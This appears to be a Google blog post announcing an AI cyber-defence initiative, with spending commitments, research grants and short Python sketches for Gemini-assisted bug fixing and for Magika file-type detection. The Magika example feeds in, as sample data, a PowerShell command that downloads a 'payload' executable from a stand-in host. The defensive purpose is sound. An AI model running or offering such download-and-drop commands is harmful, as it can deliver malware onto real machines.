
How AI can strengthen digital security


Today, many seasoned security professionals will tell you they’ve been fighting a constant battle against cybercriminals and state-sponsored attackers. They will also tell you that any clear-eyed assessment shows most patches, preventative measures and public awareness campaigns succeed only at mitigating yesterday’s threats — not the threats waiting in the wings.

That could be changing. As the world focuses on the potential of AI — and governments and industry work on a regulatory approach to ensure AI is safe and secure — we believe that AI represents an inflection point for digital security. We’re not alone. More than 40% of people view better security as a top application for AI — and it’s a topic that will be front and center at the Munich Security Conference this weekend.

AI is at a definitive crossroads — one where policymakers, security professionals and civil society have the chance to finally tilt the cybersecurity balance from attackers to cyber defenders. At a moment when malicious actors are experimenting with AI, we need bold and timely action to shape the direction of this technology. To support this work, today we’re launching a new AI Cyber Defense Initiative, including a proposed policy and technology agenda contained in our new report: Secure, Empower, Advance: How AI Can Reverse the Defender’s Dilemma.

How to tilt the cybersecurity balance from attackers to defenders

Today, as for decades, the main challenge in cybersecurity has been that attackers need just one successful, novel threat to break through the best defenses. Defenders, meanwhile, need to deploy the best defenses at all times, across increasingly complex digital terrain — and there’s no margin for error. This is the “Defender’s Dilemma,” and there has never been a reliable way to tip that balance.

Our experience deploying AI at scale informs our belief that AI can actually reverse this dynamic. AI allows security professionals and defenders to scale their work in threat detection, malware analysis, vulnerability detection, vulnerability fixing and incident response.

  • Threat detection: Gmail uses RETVec, a new multilingual neural-based text processing model, which improved spam detection rates by nearly 40% and reduced false positives by more than 19%.
  • Malware analysis: VirusTotal uses AI to review potentially malicious files. Recent research from VirusTotal shows that AI yields 70% better detection rates for malicious scripts and up to 300% improved ability to identify files that exploit vulnerabilities.
  • Vulnerability detection: Our Open Source Security team has been leveraging Gemini to improve our fuzzer’s code coverage of open-source projects, resulting in coverage increases of up to 30% across more than 120 projects and leading to the detection of new vulnerabilities.
  • Vulnerability fixing: We harnessed our Gemini model to successfully fix 15% of the bugs discovered by our sanitizer tools during testing, resulting in hundreds of bugs patched. We expect this success rate to keep improving, and we anticipate that LLMs can be used to fix bugs in many languages across the software development lifecycle (a minimal sketch of this workflow follows this list).
  • Incident response: Internally, our Detection & Response teams have begun applying generative AI to produce incident summaries. As a result, our teams are seeing 51% time savings and higher-quality results in incident analysis output.
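
To make the vulnerability-fixing workflow concrete, here is a minimal sketch of how an LLM can be asked to draft a patch from a sanitizer report. It uses the public google-generativeai Python SDK as a stand-in; the prompt format and the propose_fix helper are illustrative assumptions, not a description of Google’s internal pipeline.

```python
# Minimal sketch: asking an LLM to draft a patch for a sanitizer-reported
# bug. Uses the public google-generativeai SDK; the prompt and helper are
# illustrative assumptions, not Google's internal tooling.
import google.generativeai as genai

genai.configure(api_key="YOUR_API_KEY")  # assumption: key-based auth
model = genai.GenerativeModel("gemini-pro")

def propose_fix(source_snippet: str, sanitizer_report: str) -> str:
    """Return a candidate patch for code flagged by a sanitizer."""
    prompt = (
        "A sanitizer flagged a bug during testing.\n\n"
        f"Sanitizer report:\n{sanitizer_report}\n\n"
        f"Affected code:\n{source_snippet}\n\n"
        "Return only the corrected code."
    )
    response = model.generate_content(prompt)
    return response.text  # candidate patch; must be rebuilt and re-tested
```

Any candidate patch would still be compiled, re-run against the original reproducer and human-reviewed before landing — which is what keeps an automated fix rate like 15% useful rather than risky.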

Three ways we’re applying AI to security while supporting others

Through the AI Cyber Defense Initiative, we’re continuing our investment in an AI-ready infrastructure, releasing new tools for defenders, and launching new research and AI security training. These commitments are designed to help AI secure, empower and advance our collective digital future.

1. Secure. We believe AI security technologies, just like other technologies, need to be secure by design and by default — or they could further deepen the Defender’s Dilemma. This is why we started the Secure AI Framework as a vehicle to collaborate on best practices for securing AI systems. To build on these efforts to foster a more secure AI ecosystem:

  • We continue to invest in our secure, AI-ready network of global data centers. To help turn the tide in cyberspace, we need to make new AI innovations available to public sector organizations and businesses of all sizes across industries. From 2019 through the end of 2024, we will have invested over $5 billion in data centers in Europe — helping support secure, reliable access to a range of digital services, including broad generative AI capabilities like our Vertex AI platform.
  • We’re announcing a new “AI for Cybersecurity” cohort of 17 startups from the UK, US and EU under the Google for Startups Growth Academy’s AI for Cybersecurity Program. This will help strengthen the transatlantic cybersecurity ecosystem with internationalization strategies, AI tools, and the skills to use them.

2. Empower. AI governance choices made today can shift the terrain in cyberspace in unintended ways. Our societies need a balanced regulatory approach to AI usage and adoption to avoid a future where attackers can innovate but defenders cannot. We need targeted investments, partnerships between industry and government, and effective regulatory approaches to empower organizations to maximize the value of AI while limiting its utility to adversaries. To help give defenders the upper hand in this fight:

  • We’re expanding our $15 million Google.org Cybersecurity Seminars Program, initially announced at GSEC Malaga last year, to cover all of Europe. The program, which includes AI-focused modules, helps universities train the next generation of cybersecurity experts from underserved communities.
  • We’re open-sourcing Magika, a new AI-powered tool that aids defenders with file type identification, an essential part of detecting malware. Magika already helps protect products including Gmail, Drive and Safe Browsing, and is used by our VirusTotal team to foster a safer digital environment. Magika outperforms conventional file identification methods, providing an overall 30% accuracy boost and up to 95% higher precision on traditionally hard-to-identify but potentially problematic content such as VBA, JavaScript and PowerShell (see the usage sketch after this list).
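
Because Magika ships as an open-source Python package, defenders can try it directly. The sketch below uses the released library’s identify_bytes entry point; exact result field names can vary between versions, so treat the attributes shown as assumptions to verify against the version you install.

```python
# Minimal sketch: content-type detection with the open-source Magika
# library (pip install magika). Result field names may differ across
# releases; verify against your installed version.
from magika import Magika

m = Magika()

# A PowerShell-like snippet, the kind of traditionally hard-to-identify
# content mentioned above.
payload = b'Invoke-WebRequest -Uri "http://example.com/payload" -OutFile p.exe'

result = m.identify_bytes(payload)
print(result.output.ct_label)  # e.g. "powershell" (assumed field name)
print(result.output.score)     # model confidence for the prediction
```

Because the model classifies content rather than file extensions, the same call works on renamed or extensionless files, where conventional extension- and magic-byte heuristics tend to struggle.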

3. Advance. We’re committed to advancing research that helps generate breakthroughs in AI-powered security. To support this effort, we’re announcing $2 million in research grants and strategic partnerships that will help strengthen cybersecurity research initiatives using AI, including enhancing code verification, improving understanding of how AI can be used in cyber offense and what countermeasures can defend against it, and developing large language models that are more resilient to threats. The funding is supporting researchers at institutions including The University of Chicago, Carnegie Mellon and Stanford. This builds on our ongoing efforts to stimulate the cybersecurity ecosystem, including our $12 million commitment to the New York research system last year.

The AI revolution is already underway. While people rightly applaud the promise of new medicines and scientific breakthroughs, we’re also excited about AI’s potential to solve generational security challenges while bringing us closer to the safe, secure and trusted digital world we deserve.


See our report for a detailed roadmap showing how prioritized technical, research and policy enablers can maximize the advantage for defenders and hinder attackers.